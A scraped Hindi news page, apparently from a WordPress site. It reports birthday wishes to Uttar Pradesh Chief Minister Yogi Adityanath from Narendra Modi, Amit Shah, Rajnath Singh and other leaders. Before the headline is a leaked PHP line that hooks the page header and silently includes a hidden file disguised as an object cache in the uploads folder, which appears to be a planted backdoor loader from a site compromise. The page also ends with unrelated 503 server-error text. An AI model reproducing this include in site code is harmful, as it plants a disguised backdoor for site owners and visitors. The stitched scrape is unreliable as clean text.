add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); CM Yogi Birthday: पीएम मोदी, गृह मंत्री अमित शाह समेत इन राजनेताओं ने दी CM योगी को जन्मदिन की शुभकामनाएं – SOCH INDIA
Menu

देश
CM Yogi Birthday: पीएम मोदी, गृह मंत्री अमित शाह समेत इन राजनेताओं ने दी CM योगी को जन्मदिन की शुभकामनाएं

nobanner

उत्तर प्रदेश के मुख्यमंत्री योगी आदित्यनाथ 5 जून यानी गुरुवार को अपना 53वां जन्मदिन मना रहे हैं. इस अवसर पर प्रधानमंत्री नरेंद्र मोदी, गृह मंत्री अमित शाह समेत कई राजनेताओं ने उन्हें बधाई और शुभकामनाएं दी हैं. प्रधानमंत्री नरेंद्र मोदी ने सीएम योगी के लिए  स्वस्थ जीवन की कामनाएं की हैं. प्रधानमंत्री मोदी ने सीएम योगी के जन्मदिन पर सोशल मीडिया प्लेटफॉर्म एक्स पर एक पोस्ट किया.

पीएम मोदी ने एक्स पर लिखा, “उत्तर प्रदेश के मुख्यमंत्री योगी आदित्यनाथ को जन्मदिन की हार्दिक शुभकामनाएं. उन्होंने विभिन्न क्षेत्रों में उत्तर प्रदेश को बदलने के लिए तमाम कोशिशें की हैं. जिससे राज्य के लोगों के जीवन में सुधार आया है. ईश्वर उन्हें दीर्घायु और स्वस्थ जीवन प्रदान करें.”

सीएम योगी ने जताया पीएम मोदी का आभार

प्रधानमंत्री नरेंद्र मोदी का सीएम योगी ने आभार व्यक्त किया. सीएम योगी ने एक्स पर पोस्ट करते हुए कहा कि, ‘मन को आत्मीयता, प्रेरणा और ऊर्जा से अभिसिंचित करती मंगलमयी शुभकामनाओं के लिए आपका हार्दिक आभार आदरणीय प्रधानमंत्री. आपकी शुभेच्छाएं अक्षय ऊर्जा का स्रोत हैं और 25 करोड़ प्रदेश वासियों के जीवन में सकारात्मक परिवर्तन लाने के हमारे संकल्प की पूर्ति हेतु अथाह शक्ति प्रदान करने वाली हैं. राष्ट्र प्रथम की भावना से दीप्त आपके यशस्वी मार्गदर्शन में ‘विकसित भारत-विकसित उत्तर प्रदेश’ की संकल्पना की सिद्धि के पथ पर उत्तर प्रदेश अविराम गतिशील है.’

गृह मंत्री शाह ने भी दी बधाई

पीएम मोदी के अलावा केंद्रीय गृह मंत्री अमित शाह ने भी सीएम योगी को जन्मदिन की बधाई दी. उन्होंने एक पोस्ट में कहा, यूपी के मुख्यमंत्री योगी आदित्यनाथ को जन्मदिन की हार्दिक शुभकामनाएं. पीएम मोदी के नेतृत्व में उत्तर प्रदेश की डबल इंजन सरकार जन-जन तक विकास और गरीब कल्याण के लाभ पहुंचा रही है. ईश्वर से आपके उत्तम स्वास्थ्य और सुदीर्घ जीवन की कामना करता हूं.

रक्षा मंत्री राजनाथ सिंह ने भी दीं शुभकामनाएं

वहीं रक्षा मंत्री राजनाथ सिंह ने भी सीएम योगी को उनके जन्मदिन पर बधाई और शुभकामनाएं दी. उन्होंने एक्स पर एक पोस्ट किया. जिसमें उन्होंने लिखा, ‘यूपी के ऊर्जावान और गतिशील मुख्यमंत्री योगी आदित्यनाथ को जन्मदिन की हार्दिक शुभकामनाएं. हाल के सालों में उन्होंने राज्य को विकास की नई ऊंचाइयों तक पहुंचाया है. विकास और लोक कल्याण की दृष्टि से वे लगातार परिश्रम कर रहे हैं. ईश्वर उन्हें उत्तम स्वास्थ्य एवं लंबी आयु का वरदान दें.

इन राजनेताओं ने भी दी सीएम योगी की जन्मदिन की बधाई

इनके अलावा कई राज्यों के मुख्यमंत्री और राजनेताओं ने भी सीएम योगी को उनके 53वें जन्मदिन के अवसर पर बधाई और शुभकामनाएं दीं. इनमें यूपी के डिप्टी सीएम केशव प्रसाद मौर्य, महाराष्ट्र के सीएम देवेंद्र फडणवीस, बीजेपी के राज्यसभा सांसद दिनेश, बीजेपी अध्यक्ष और केंद्रीय मंत्री जेपी नड्डा, नितिन गडकरी, मध्य प्रदेश के सीएम मोहन यादव, हरियाणा के सीएम नायब सिंह सैनी, राजस्थान के मुख्यमंत्री भजनलाल शर्मा, उत्तराखंड के सीएम पुष्कर सिंह धामी, महाराष्ट्र के सीएम देवेंद्र फडणवीस, सिक्किम के सीएम प्रेम सिंह तमांग का नाम शामिल है.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.